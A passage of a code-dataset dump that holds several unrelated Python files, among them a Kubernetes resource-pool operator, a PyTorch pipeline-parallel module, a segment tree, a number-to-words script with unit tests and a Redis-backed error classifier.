ko.delete_resource(\n reference['apiVersion'], reference['kind'],\n reference['name'], reference.get('namespace', None)\n )\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace,\n 'resourcehandles', handle['metadata']['name'],\n { 'metadata': { 'finalizers': None } }\n )\n\ndef manage_pool(pool, logger):\n pool_meta = pool['metadata']\n pool_namespace = pool_meta['namespace']\n pool_name = pool_meta['name']\n\n if pool_namespace != ko.operator_namespace:\n logger.info('Ignoring ResourcePool %s in namespace %s', pool_name, pool_namespace)\n return\n\n if not pool['metadata'].get('finalizers', None):\n add_finalizer_to_pool(pool, logger)\n return\n\n with pool_management_lock:\n unbound_handle_count = len(get_unbound_handles_for_pool(pool_name, logger))\n handle_deficit = pool['spec'].get('minAvailable', 0) - unbound_handle_count\n if handle_deficit <= 0:\n return\n for i in range(handle_deficit):\n handle = create_handle_for_pool(pool, logger)\n logger.info('Created ResourceHandle %s for ResourcePool %s', handle['metadata']['name'], pool_name)\n\ndef manage_pool_by_ref(ref, logger):\n try:\n pool = ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, ref['namespace'],\n 'resourcepools', ref['name']\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status == 404:\n logger.warning('Unable to find ResourcePool %s/%s', ref['namespace'], ref['name'])\n return\n else:\n raise\n manage_pool(pool, logger)\n\ndef manage_pool_deleted(pool, logger):\n pool_meta = pool['metadata']\n pool_name = pool_meta['name']\n logger.info('ResourcePool %s deleted', pool_name)\n\ndef manage_pool_pending_delete(pool, logger):\n pool_meta = pool['metadata']\n pool_name = pool_meta['name']\n delete_unbound_handles_for_pool(pool, logger)\n handle = ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcepools', pool_name,\n { 'metadata': { 'finalizers': None } }\n )\n\ndef match_handle_to_claim(claim, logger):\n \"\"\"\n List unbound ResourceHandles and attempt to match one to ResourceClaim\n\n The claim may specify a specific resource pool in an annotation to restrict\n the search to a specific pool.\n \"\"\"\n claim_meta = claim['metadata']\n annotations = claim_meta.get('annotations', {})\n pool_name = annotations.get(ko.operator_domain + '/resource-pool-name', None)\n if pool_name:\n label_selector = '!{0}/resource-claim-name,{0}/resource-pool-name={1}'.format(\n ko.operator_domain, pool_name\n )\n else:\n label_selector = '!{0}/resource-claim-name'.format(ko.operator_domain)\n\n best_match = None\n best_match_diff_count = None\n best_match_creation_timestamp = None\n for handle in ko.custom_objects_api.list_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles',\n label_selector=label_selector\n ).get('items', []):\n claim_resources = claim['spec']['resources']\n status_resources = claim['status']['resources']\n handle_resources = handle['spec']['resources']\n if len(claim_resources) != len(handle_resources):\n # Claim cannot match handle if there is a different resource count\n continue\n\n diff_count = 0\n is_match = True\n for i, claim_resource in enumerate(claim_resources):\n handle_resource = handle_resources[i]\n provider_name = status_resources[i]['provider']['name']\n if provider_name != handle_resource['provider']['name']:\n is_match = False\n break\n provider = 
ResourceProvider.find_provider_by_name(provider_name)\n            diff_patch = provider.check_template_match(handle_resource['template'], claim_resource['template'], logger)\n            if diff_patch is not None:\n                # Match with (possibly empty) difference list\n                diff_count += len(diff_patch)\n            else:\n                is_match = False\n                break\n\n        if is_match:\n            # Prefer match with the smallest diff_count and the earliest creation timestamp\n            if not best_match \\\n            or best_match_diff_count > diff_count \\\n            or (best_match_diff_count == diff_count and best_match_creation_timestamp > handle['metadata']['creationTimestamp']):\n                best_match = handle\n                best_match_creation_timestamp = handle['metadata']['creationTimestamp']\n                best_match_diff_count = diff_count\n\n    return best_match\n\ndef pause_for_provider_init():\n    if time.time() < start_time + provider_init_delay:\n        #sleep only for the remaining portion of the startup delay\n        time.sleep(start_time + provider_init_delay - time.time())\n\ndef start_resource_watch(resource_definition):\n    api_version = resource_definition['apiVersion']\n    metadata = resource_definition['metadata']\n    kind = resource_definition['kind']\n    namespace = metadata.get('namespace', None)\n\n    if namespace:\n        watcher_name = '{}:{}:{}'.format(api_version, kind, namespace)\n    else:\n        watcher_name = '{}:{}'.format(api_version, kind)\n\n    if watcher_name in ko.watchers:\n        return\n\n    if '/' in api_version:\n        group, version = api_version.split('/')\n    else:\n        group, version = None, api_version\n\n    w = ko.create_watcher(\n        name=watcher_name,\n        kind=kind,\n        group=group,\n        namespace=namespace,\n        version=version\n    )\n    w.handler = watch_resource_event\n    w.start()\n\ndef validate_claim(claim, logger):\n    \"\"\"\n    Check claim validity against providers for resources\n    \"\"\"\n    resources = claim['spec'].get('resources', [])\n    status_resources = claim['status'].get('resources', [])\n\n    if len(status_resources) != len(resources):\n        logger.warning('Number of resources in status does not match resources in spec')\n        return False\n\n    for i, resource in enumerate(resources):\n        try:\n            status_resource = status_resources[i]\n            provider_name = status_resource['provider']['name']\n            provider = ResourceProvider.find_provider_by_name(provider_name)\n            if not provider:\n                logger.warning('Unable to find ResourceProvider %s', provider_name)\n                return False\n            validation_error = provider.validate_resource_template(resource['template'], logger)\n            if validation_error:\n                logger.warning('Validation failure for spec.resources[%s].template: %s', i, validation_error)\n                return False\n        except IndexError:\n            logger.warning('ResourceClaim has more resources than resourceProviders!')\n            return False\n    return True\n\ndef watch_resource_event(event):\n    event_type = event['type']\n    if event_type in ['ADDED', 'DELETED', 'MODIFIED']:\n        resource = event['object']\n        if hasattr(resource, 'to_dict'):\n            resource = resource.to_dict()\n        metadata = resource['metadata']\n        annotations = metadata.get('annotations', None)\n        if not annotations:\n            return\n        annotation_prefix = ko.operator_domain + '/resource-'\n        handle_name = annotations.get(annotation_prefix + 'handle-name', None)\n        handle_namespace = annotations.get(annotation_prefix + 'handle-namespace', None)\n        claim_name = annotations.get(annotation_prefix + 'claim-name', None)\n        claim_namespace = annotations.get(annotation_prefix + 'claim-namespace', None)\n        resource_index = int(annotations.get(annotation_prefix + 'index', 0))\n\n        if not handle_name \\\n        or handle_namespace != ko.operator_namespace:\n            return\n\n        if event_type == 'DELETED':\n            manage_handle_lost_resource(handle_name, resource, resource_index)\n\n        
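#Mirror resource status changes into the owning ResourceClaim so that\n        #claim.status.resources tracks the live state of each managed resource.\n        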
if claim_name and claim_namespace:\n if event_type == 'DELETED':\n manage_claim_resource_delete(claim_namespace, claim_name, resource, resource_index)\n else:\n manage_claim_resource_update(claim_namespace, claim_name, resource, resource_index)\n else:\n ko.logger.warning(event)\n\nclass ResourceProvider(object):\n\n providers = {}\n resource_watchers = {}\n\n @staticmethod\n def find_provider_by_name(name):\n return ResourceProvider.providers.get(name, None)\n\n @staticmethod\n def find_provider_by_template_match(template):\n for provider in ResourceProvider.providers.values():\n if provider.is_match_for_template(template):\n return provider\n\n @staticmethod\n def manage_provider(provider):\n provider = ResourceProvider(provider)\n ResourceProvider.providers[provider.name] = provider\n\n @staticmethod\n def manage_provider_deleted(provider_name):\n if provider_name in ResourceProvider.providers:\n del ResourceProvider.providers[provider_name]\n\n def __init__(self, provider):\n self.metadata = provider['metadata']\n self.spec = provider['spec']\n self.__init_resource_validator()\n\n def __init_resource_validator(self):\n open_api_v3_schema = self.spec.get('validation', {}).get('openAPIV3Schema', None)\n if not open_api_v3_schema:\n self.resource_validator = None\n return\n self.resource_validator = openapi_schema_validator.OAS30Validator(open_api_v3_schema)\n\n @property\n def name(self):\n return self.metadata['name']\n\n @property\n def namespace(self):\n return self.metadata['namespace']\n\n @property\n def match(self):\n return self.spec.get('match', None)\n\n @property\n def match_ignore(self):\n return self.spec.get('matchIgnore', [])\n\n @property\n def override(self):\n return self.spec.get('override', {})\n\n @property\n def resource_requires_claim(self):\n return self.spec.get('resourceRequiresClaim', False)\n\n def check_template_match(self, handle_resource, claim_resource, logger):\n \"\"\"\n Check if a resource in a handle matches a resource in a claim\n \"\"\"\n patch = [\n item for item in gpte.kubeoperative.jsonpatch_from_diff(\n handle_resource, claim_resource\n ) if item['op'] in ['add', 'replace']\n ]\n # Return false if any item from the patch is not ignored\n ignore_re_list = [ re.compile(pattern + '$') for pattern in self.match_ignore ]\n for item in patch:\n ignored = False\n for ignore_re in ignore_re_list:\n if ignore_re.match(item['path']):\n ignored = True\n if not ignored:\n return None\n return patch\n\n def is_match_for_template(self, template):\n \"\"\"\n Check if this provider is a match for the resource template by checking\n that all fields in the match definition match the template.\n \"\"\"\n if not self.match:\n return False\n cmp_template = copy.deepcopy(template)\n dict_merge(cmp_template, self.match)\n return template == cmp_template\n\n def resource_claim_template_defaults(self, resource_claim, resource_index):\n defaults = self.spec.get('default', {})\n open_api_v3_schema = self.spec.get('validation', {}).get('openAPIV3Schema', None)\n\n if open_api_v3_schema:\n schema_defaults = defaults_from_schema(open_api_v3_schema)\n if schema_defaults:\n dict_merge(defaults, schema_defaults)\n\n return recursive_process_template_strings(\n defaults,\n {\n 'resource_claim': resource_claim,\n 'resource_index': resource_index,\n 'resource_provider': self\n }\n )\n\n def resource_definition_from_template(self, handle, claim, resource_index, logger):\n if claim:\n requester_identity, requester_user = get_requester_from_namespace(\n 
claim['metadata']['namespace']\n )\n else:\n requester_identity = requester_user = None\n\n handle_name = handle['metadata']['name']\n handle_generate_name = handle['metadata'].get('generateName')\n if handle_generate_name and handle_name.startswith(handle_generate_name):\n guid = handle_name[len(handle_generate_name):]\n elif handle_name.startswith('guid-'):\n guid = handle_name[5:]\n else:\n guid = handle_name[-5:]\n\n resource = copy.deepcopy(handle['spec']['resources'][resource_index]['template'])\n if 'override' in self.spec:\n dict_merge(resource, self.override)\n if 'metadata' not in resource:\n resource['metadata'] = {}\n if 'name' not in resource['metadata']:\n # If name prefix was not given then use prefix \"guidN-\" with resource index to\n # prevent name conflicts. If the resource template does specify a name prefix\n # then it is expected that the template configuration prevents conflicts.\n if 'generateName' not in resource['metadata']:\n resource['metadata']['generateName'] = 'guid{}-'.format(resource_index)\n resource['metadata']['name'] = \\\n resource['metadata']['generateName'] + guid\n if 'annotations' not in resource['metadata']:\n resource['metadata']['annotations'] = {}\n resource['metadata']['annotations'].update({\n ko.operator_domain + '/resource-provider-name': self.name,\n ko.operator_domain + '/resource-provider-namespace': self.namespace,\n ko.operator_domain + '/resource-handle-name': handle['metadata']['name'],\n ko.operator_domain + '/resource-handle-namespace': handle['metadata']['namespace'],\n ko.operator_domain + '/resource-handle-uid': handle['metadata']['uid'],\n ko.operator_domain + '/resource-handle-version': handle['metadata']['resourceVersion'],\n ko.operator_domain + '/resource-index': str(resource_index)\n })\n if claim:\n resource['metadata']['annotations'].update({\n ko.operator_domain + '/resource-claim-name': claim['metadata']['name'],\n ko.operator_domain + '/resource-claim-namespace': claim['metadata']['namespace'],\n })\n if requester_identity:\n resource['metadata']['annotations'].update({\n ko.operator_domain + '/resource-requester-email':\n requester_identity.get('extra', {}).get('email', ''),\n ko.operator_domain + '/resource-requester-name':\n requester_identity.get('extra', {}).get('name', ''),\n ko.operator_domain + '/resource-requester-preferred-username':\n requester_identity.get('extra', {}).get('preferred_username', ''),\n })\n if requester_user:\n resource['metadata']['annotations'].update({\n ko.operator_domain + '/resource-requester-user':\n requester_user['metadata']['name']\n })\n\n return recursive_process_template_strings(resource, {\n \"requester_identity\": requester_identity,\n \"requester_user\": requester_user,\n \"resource_provider\": self,\n \"resource_handle\": handle,\n \"resource_claim\": claim\n })\n\n def update_resource(self, handle, resource, resource_definition, logger):\n handle_uid = handle['metadata']['uid']\n handle_version = handle['metadata']['resourceVersion']\n\n annotations = resource['metadata'].get('annotations', {})\n if handle_uid != annotations.get(ko.operator_domain + '/resource-handle-uid') \\\n or handle_version != annotations.get(ko.operator_domain + '/resource-handle-version'):\n update_filters = self.spec.get('updateFilters', []) + [{\n 'pathMatch': '/metadata/annotations/' + re.escape(ko.operator_domain) + '~1resource-.*'\n }]\n ko.patch_resource(\n resource=resource,\n patch=resource_definition,\n update_filters=update_filters\n )\n\n def validate_resource_template(self, template, 
logger):\n try:\n if self.resource_validator:\n validation_result = self.resource_validator.validate(template)\n except Exception as e:\n return str(e)\n\n@kopf.on.event(ko.operator_domain, ko.version, 'resourceproviders')\ndef watch_providers(event, logger, **_):\n if event['type'] == 'DELETED':\n provider = event['object']\n provider_name = provider['metadata']['name']\n provider_namespace = provider['metadata']['namespace']\n if provider_namespace == ko.operator_namespace:\n ResourceProvider.manage_provider_deleted(provider_name)\n logger.info('Removed ResourceProvider %s', provider_name)\n elif event['type'] in ['ADDED', 'MODIFIED', None]:\n provider = event['object']\n provider_name = provider['metadata']['name']\n provider_namespace = provider['metadata']['namespace']\n if provider_namespace == ko.operator_namespace:\n ResourceProvider.manage_provider(provider)\n logger.info('Discovered ResourceProvider %s', provider_name)\n else:\n logger.info(\n 'Ignoring ResourceProvider %s in namespace %s',\n provider_name, provider_namespace\n )\n else:\n logger.warning('Unhandled ResourceProvider event %s', event)\n\n@kopf.on.event(ko.operator_domain, ko.version, 'resourceclaims')\ndef watch_resource_claims(event, logger, **_):\n pause_for_provider_init()\n claim = event['object']\n if event['type'] == 'DELETED':\n manage_claim_deleted(claim, logger)\n elif event['type'] in ['ADDED', 'MODIFIED', None]:\n manage_claim(claim, logger)\n else:\n logger.warning('Unhandled ResourceClaim event %s', event)\n\n@kopf.on.event(ko.operator_domain, ko.version, 'resourcehandles')\ndef watch_resource_handles(event, logger, **_):\n pause_for_provider_init()\n handle = event['object']\n if event['type'] == 'DELETED':\n manage_handle_deleted(handle, logger)\n elif event['type'] in ['ADDED', 'MODIFIED', None]:\n manage_handle(handle, logger)\n else:\n logger.warning('Unhandled ResourceHandle event %s', event)\n\n@kopf.on.event(ko.operator_domain, ko.version, 'resourcepools')\ndef watch_resource_pools(event, logger, **_):\n pause_for_provider_init()\n if event['type'] == 'DELETED':\n pool = event['object']\n manage_pool_deleted(pool, logger)\n elif event['type'] in ['ADDED', 'MODIFIED', None]:\n pool = event['object']\n if 'deletionTimestamp' in pool['metadata']:\n manage_pool_pending_delete(pool, logger)\n else:\n manage_pool(pool, logger)\n else:\n logger.warning('Unhandled ResourcePool event %s', event)\n","sub_path":"operator/operator.py","file_name":"operator.py","file_ext":"py","file_size_in_byte":43772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"20249959","text":"import torch\nimport torch.nn as nn\nfrom torch import autograd\nfrom typing import Iterable, List, Tuple\nfrom pipeline.sync_wrapper import *\n\n\nclass PipelineParallel(nn.Module):\n \"\"\"\n class that gets submodules of one large model and the devices they should be on (+ microbatch size)\n and makes the large model that they consist as a pipeline with each submodule being a station\n **IMPORTANT** this is functionally like 'Sequential(submodules)', so be aware of that and make sure that\n the list submodules reflects what you want\n \"\"\"\n\n def __init__(self, module: nn.Module, microbatch_size: int, num_gpus: int, input_shape: Tuple[int, ...] 
= None,\n mode: str = 'train', counter: CycleCounter = None, main_device: str = 'cpu', wrappers=None):\n super(PipelineParallel, self).__init__()\n\n self.main_device = main_device\n self.microbatch_size = microbatch_size\n self.num_gpus = num_gpus\n\n self.module = module\n self.wrappers = module.wrappers if wrappers is None else wrappers\n self.input_shape = input_shape\n\n if counter is None:\n counter = CycleCounter(ForwardMode[mode], num_gpus)\n for wrapper in self.wrappers:\n wrapper.set_counter(counter)\n\n self.counter = counter\n\n self.mode = None\n self.set_mode(mode)\n\n def train(self, mode=True):\n super(PipelineParallel, self).train(mode)\n if mode:\n self.set_mode('train')\n else:\n self.set_mode('production')\n\n def set_mode(self, mode: str):\n if self.mode == mode:\n return\n\n self.mode = mode\n self.counter.change_mode(mode)\n for wrapper in self.wrappers:\n wrapper.change_mode(mode)\n\n def finished_prop(self):\n self.counter.reset()\n for wrapper in self.wrappers:\n wrapper.finished_prop()\n\n def forward(self, input: torch.Tensor) -> torch.Tensor:\n \"\"\"\n forward propagation of the entire model\n will run in a pipeline using the cuda kernels and the prod_line function\n makes sure that the backward propagation hook is also added\n\n note: a forward propagation deletes all previously saved activations,\n so if you want to use backward with some results, do it before running the model again\n on other inputs\n\n :param input: inputted batch\n :return: results of forward propagation on the batch\n \"\"\"\n microbatches = input.split(self.microbatch_size, dim=0)\n num_runs = len(microbatches)\n\n if self.input_shape is None:\n self.input_shape = (1, *input[0].size())\n\n # make sure that the counter knows how many microbatches there are\n self.counter.reset()\n self.counter.set_num_runs(num_runs)\n\n if self.mode == 'backward':\n if self.training:\n self.set_mode('train')\n else:\n self.set_mode('production')\n\n results = []\n # the actual pipeline process of feeding the data and receiving outputs:\n for cycle in range(self.num_gpus + num_runs - 1):\n # feeding the module all the microbatches, then, until the forward\n # propagation process ends needs to feed garbage.\n if cycle < num_runs:\n input = microbatches[cycle]\n else:\n input = torch.zeros(*self.input_shape)\n\n result: torch.Tensor = self.module(input)\n\n # the first microbatch will finish the forward propagation only\n # after num_gpus cycles.\n if cycle >= self.num_gpus - 1:\n if self.training:\n result.requires_grad_()\n result.register_hook(lambda grad: self.wrappers[-1].act_hook(grad))\n results.append(result.to(self.main_device))\n\n self.counter.increase()\n\n # make sure that the counter and wrappers are returned to default mode\n self.finished_prop()\n\n output = torch.cat(tuple(results), dim=0).detach_()\n if self.training:\n output.requires_grad_()\n output.register_hook(lambda grad: self.backward(grad, results))\n return output\n\n def backward(self, grads: torch.Tensor, results: List[torch.Tensor]):\n \"\"\"\n does backward propagation with gradients of full results,\n works as hook for normal autograd backward propagation so it usually shouldn't\n be called implicitly but used as part of loss.backward() or something like that\n :param grads: the gradient of the model outputs\n :param results: the results tensor that is doing a backward pass\n \"\"\"\n num_runs = len(results)\n\n # make sure that the counter knows how many microbatches there are\n self.counter.set_num_runs(num_runs)\n\n # 
make sure that we are on backward mode\n self.set_mode('backward')\n\n # do a backward run for each gradient\n for grad, result in zip(grads.split(self.microbatch_size, dim=0), results):\n result.backward(grad)\n self.module(torch.zeros(*self.input_shape))\n\n # make sure that all backward passes are done\n for _ in range(self.num_gpus):\n self.module(torch.zeros(*self.input_shape))\n\n # get final gradients\n # out_grads = self.wrappers[0].get_final_grads()\n\n # make sure that the counter and wrappers are returned to default mode\n self.finished_prop()\n\n # return out_grads\n\n","sub_path":"pipeline/pipeline_parallel.py","file_name":"pipeline_parallel.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"100672011","text":"import math\n\n\n# find Largest Contiguous\n# Subarray sum in a given range with updates\nclass SegmentTree:\n    def __init__(self, N):\n        # segment tree for N numbers\n        self.tree = [0 for _ in range(2 * N + 1)]\n\n    def build(self, A: list, lo: int, hi: int, i: int):\n        if lo == hi:\n            self.tree[i] = A[lo]\n        else:\n            mid, L, R = lo + (hi - lo >> 1), 2 * i + 1, 2 * i + 2\n            self.build(A, lo, mid, L)\n            self.build(A, mid + 1, hi, R)\n            self.tree[i] = self.tree[L] + self.tree[R]\n\n    def update(self, A: list, i: int, lo: int, hi: int, idx: int, value: int):\n        if lo == hi:\n            self.tree[i] = value\n        else:\n            mid, L, R = lo + (hi - lo >> 1), 2 * i + 1, 2 * i + 2\n            if idx <= mid:\n                self.update(A, L, lo, mid, idx, value)\n            else:\n                self.update(A, R, mid + 1, hi, idx, value)\n            self.tree[i] = self.tree[L] + self.tree[R]\n\n    def query(self, A: list, i: int, lo: int, hi: int, l: int, r: int):\n        if r < lo or hi < l:\n            return -math.inf\n        elif l <= lo and hi <= r:\n            return self.tree[i]\n        else:\n            mid, L, R = lo + (hi - lo >> 1), 2 * i + 1, 2 * i + 2\n            if l > mid:\n                return self.query(A, R, mid + 1, hi, l, r)\n            elif r <= mid:\n                return self.query(A, L, lo, mid, l, r)\n            right = self.query(A, R, mid + 1, hi, l, r)\n            left = self.query(A, L, lo, mid, l, r)\n            return left + right\n\n","sub_path":"data_structure/python/segment_tree_sum.py","file_name":"segment_tree_sum.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"408038114","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport numpy as np\nfrom sklearn import decomposition\nfrom PIL import Image\n\nTupian = Image.open('test.jpg')\n\nLupian = Tupian.convert('L')\nLupian.save(\"gray.jpg\")\n\ndata = []\nimage = img.imread('gray.jpg')\nprint(image.shape)\ndata.append(image)\n\nn_row, n_col = 2,3\nn_components = 6\nimage_shape = (24,30)\n\ndef plot_gallery(title, images, n_col=n_col, n_row=n_row):\n    plt.figure(figsize=(2. 
* n_col, 2.26 * n_row)) \n plt.suptitle(title, size=16)\n \n for i, comp in enumerate(images):\n plt.subplot(n_row, n_col, i + 1)\n vmax = max(comp.max(), -comp.min())\n \n plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,\n interpolation='nearest', vmin=-vmax, vmax=vmax)\n plt.xticks(())\n plt.yticks(())\n plt.subplots_adjust(0.01, 0.05, 0.99, 0.94, 0.04, 0.)\n plt.savefig(str(name))\n\nestimators = [('Eigenfaces - PCA using randomized SVD',decomposition.PCA(n_components=1,whiten=True)),\\\n ('Non-negative components - NMF',decomposition.NMF(n_components=1,init='nndsvda',tol=5e-3))]\n\nfor name,estimator in estimators:\n print(\"Extracting the top %d %s...\" % (n_components,name))\n print(image.shape)\n estimator.fit(image)\n components_ = estimator.components_\n print(components_)\n print(len(components_[0]))\n plot_gallery(name, components_[:n_components])\n\nplt.show()","sub_path":"code/降维/NMF.py","file_name":"NMF.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"32946858","text":"#!/usr/bin/env python3\n\n\"\"\"\nScript to print numbers from 1 to X in alphabetical order\n\"\"\"\n\nimport argparse\nimport unittest\n\nDEFAULT_MAX = 1_000_000\n\nSMALL = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\", \"nine\", \"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\", \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\"]\nTENS = [None, None, \"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\", \"eighty\", \"ninety\"]\n\ndef number_to_word(number):\n if number < len(SMALL):\n return SMALL[number]\n digits = list(reversed([int(x) for x in str(number)]))\n if number < 100:\n if digits[0] == 0:\n return TENS[digits[1]]\n return \"%s %s\" % (TENS[digits[1]], SMALL[digits[0]])\n if number < 1000:\n two_digits = 10 * digits[1] + digits[0]\n hundred = SMALL[digits[2]] + \" hundred\"\n if two_digits == 0:\n return hundred\n return \"%s and %s\" % (hundred, number_to_word(two_digits))\n if number < 1_000_000:\n three_digits = 100 * digits[2] + 10 * digits[1] + digits[0]\n thousands = digits[3]\n if len(digits) > 4:\n thousands = thousands + digits[4] * 10\n if len(digits) > 5:\n thousands = thousands + digits[5] * 100\n thousands_string = \"%s thousand\" % number_to_word(thousands)\n if three_digits == 0:\n return thousands_string\n return \"%s %s\" % (thousands_string, number_to_word(three_digits))\n if number == 1_000_000:\n return \"one million\"\n\n\n raise ValueError(\"Unexpected number %s\" % (number,))\n\ndef run_tests():\n \"\"\"\n Tests\n \"\"\"\n\n class Tester(unittest.TestCase):\n\n def one_test(self, number, expected_word):\n actual_word = number_to_word(number)\n self.assertEqual(expected_word, actual_word)\n\n def test_small(self):\n self.one_test(0, \"zero\")\n self.one_test(2, \"two\")\n self.one_test(7, \"seven\")\n self.one_test(9, \"nine\")\n self.one_test(15, \"fifteen\")\n\n def test_tens(self):\n self.one_test(20, \"twenty\")\n self.one_test(21, \"twenty one\")\n self.one_test(35, \"thirty five\")\n self.one_test(99, \"ninety nine\")\n\n def test_hundreds(self):\n self.one_test(100, \"one hundred\")\n self.one_test(500, \"five hundred\")\n self.one_test(520, \"five hundred and twenty\")\n self.one_test(329, \"three hundred and twenty nine\")\n\n def test_thousands(self):\n self.one_test(1000, \"one thousand\")\n self.one_test(4000, \"four thousand\")\n self.one_test(45000, \"forty five 
thousand\")\n self.one_test(100000, \"one hundred thousand\")\n self.one_test(451000, \"four hundred and fifty one thousand\")\n \n def test_thousands_with_hundreds(self):\n self.one_test(1001, \"one thousand one\")\n self.one_test(4511, \"four thousand five hundred and eleven\")\n self.one_test(201592, \"two hundred and one thousand five hundred and ninety two\")\n\n def test_million(self):\n self.one_test(1_000_000, \"one million\")\n\n unittest.TextTestRunner(verbosity=2).run(unittest.TestLoader().loadTestsFromTestCase(Tester))\n\ndef show(max_number):\n numbers = [number_to_word(x) for x in range(0, max_number+1)]\n for number in sorted(numbers):\n print(number)\n\n\ndef main():\n\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"action\", choices=[\"test\", \"show\"])\n parser.add_argument(\"--max-number\", type=int)\n args = parser.parse_args()\n\n max_number = args.max_number\n if max_number is None:\n max_number = DEFAULT_MAX\n \n if args.action == \"test\":\n run_tests()\n elif args.action == \"show\":\n show(max_number)\n else:\n raise ValueError(\"Unexpected action %s\" % (args.action))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"582549805","text":"from eca import *\nfrom eca.generators import start_offline_tweets\n\n## You might have to update the root path to point to the correct path\n## (by default, it points to _static)\n#root_content_path = 'template_static'\n\n\n# binds the 'setup' function as the action for the 'init' event\n# the action will be called with the context and the event\n@event('init')\ndef setup(ctx, e):\n start_offline_tweets('batatweets.txt', 'chirp', time_factor=100000)\n ctx.count = 0\n fire('timer')\ntweet_count = 0\n@event('timer')\n#loop that updates the rolling chart and gauge every second\ndef checktime(ctx, e):\n global tweet_count\n #Workaround for if no tweets have been counted:\n if tweet_count == 0:\n tweet_count=0.01\n emit('tweetcount',{'action': 'add', 'value': tweet_count})\n #Reset tweet count for next iteration\n tweet_count=0\n fire('timer', delay=1)\n#For every tweet add the hashtags to the wordcloud with value 1\ndef updateWordCloud(tweetdata):\n hashtags = tweetdata['entities']['hashtags']\n for i in range(len(hashtags)):\n emit('word', {'action': 'add', 'value': [hashtags[i][\"text\"], 1]})\n#For every tweet send, if coordinates exist, coordinates and tweet text to tweetmap\ndef updateMap(tweetdata):\n if tweetdata['coordinates'] != None:\n emit('map', {'action': 'add', 'values': [tweetdata['coordinates']['coordinates'], tweetdata[\"text\"]]})\n#Emit tweet if user matches @batavierenrace\ndef updateOfficialTweet(tweetdata):\n if tweetdata['user']['id_str'] == \"19373068\":\n emit('officialtweet', tweetdata)\n#tweet event\n@event('chirp')\ndef tweet(ctx, e):\n global tweet_count\n tweet_count = tweet_count + 1\n #Retrieve tweet data from e\n tweetdata = e.data\n #Call update functions for wordcloud, map, official tweetfeed\n updateWordCloud(tweetdata)\n updateMap(tweetdata)\n updateOfficialTweet(tweetdata)\n #update live tweet feed\n emit('tweet', tweetdata)\n","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"537095228","text":"from django import template\nfrom gestor.models import 
Sponsor\nregister = template.Library()\n\n\n@register.inclusion_tag('gestor/sponsors.html', takes_context=True)\ndef show_sponsors(context):\n sponsors = Sponsor.objects.filter(publicado=True)\n return {'sponsors': sponsors.exclude(destacar=True),\n 'destacados': sponsors.exclude(destacar=False)}\n","sub_path":"gestor/templatetags/sponsors.py","file_name":"sponsors.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"116041610","text":"import datetime\nimport json\nimport time\n\nfrom logbook import Logger\nfrom logbook import TimedRotatingFileHandler\nfrom optparse import OptionParser\n\nimport config\nimport classifier\nimport category\nimport redis_util\n\n\nclass Main(object):\n \"\"\"Main loop.\"\"\"\n\n def __init__(self, conf):\n self.conf = conf\n handler = TimedRotatingFileHandler(\n conf.log_file, date_format='%Y-%m-%d')\n handler.push_application()\n self.logger = Logger('Firetower-server')\n self.queue = redis_util.get_redis_conn(\n host=conf.redis_host, port=conf.redis_port, redis_db=conf.redis_db\n )\n self.classifier = classifier.Levenshtein()\n self.last_archive = None\n\n def get_error(self):\n \"\"\"Get the next error to be categorised\"\"\"\n return self.queue.rpop(self.conf.queue_key)\n\n def run_archiving(self):\n \"\"\"Run the timeseries archiving for all categories\n \"\"\"\n now = datetime.datetime.utcnow()\n if self.last_archive is None:\n self.last_archive = datetime.datetime.utcnow()\n return\n\n delta = datetime.timedelta(seconds=self.conf.archive_time)\n if self.last_archive < (now - delta):\n self.logger.debug('Archiving counts older than %s seconds' % (self.conf.archive_time,))\n for c in category.Category.get_all_categories(self.queue):\n self.logger.debug('Archiving for %s category' % (c.cat_id))\n c.timeseries.archive_cat_counts(self.last_archive)\n self.last_archive = now\n\n def run(self):\n \"\"\"Drop into a loop pulling errors and categorizing them\"\"\"\n while 1:\n err = self.get_error()\n self.run_archiving()\n if err:\n parsed = json.loads(err)\n category.Category.classify(\n self.queue, self.classifier, parsed, self.conf.class_thresh\n )\n else:\n time.sleep(1)\n\n\ndef main():\n parser = OptionParser(usage='usage: firetower options args')\n parser.add_option(\n '-c', '--conf', action='store', dest='conf_path',\n help='Path to YAML configuration file.')\n\n (options, args) = parser.parse_args()\n\n conf = config.Config(options.conf_path)\n main = Main(conf)\n main.run()\n","sub_path":"firetower/firetower.py","file_name":"firetower.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"586530583","text":"__author__ = 'upendrakumardevisetty'\n#edited by andrew.d.l.nelson@gmail.com\n\nimport sys\n\nlistfile = sys.argv[1]\ninfile = 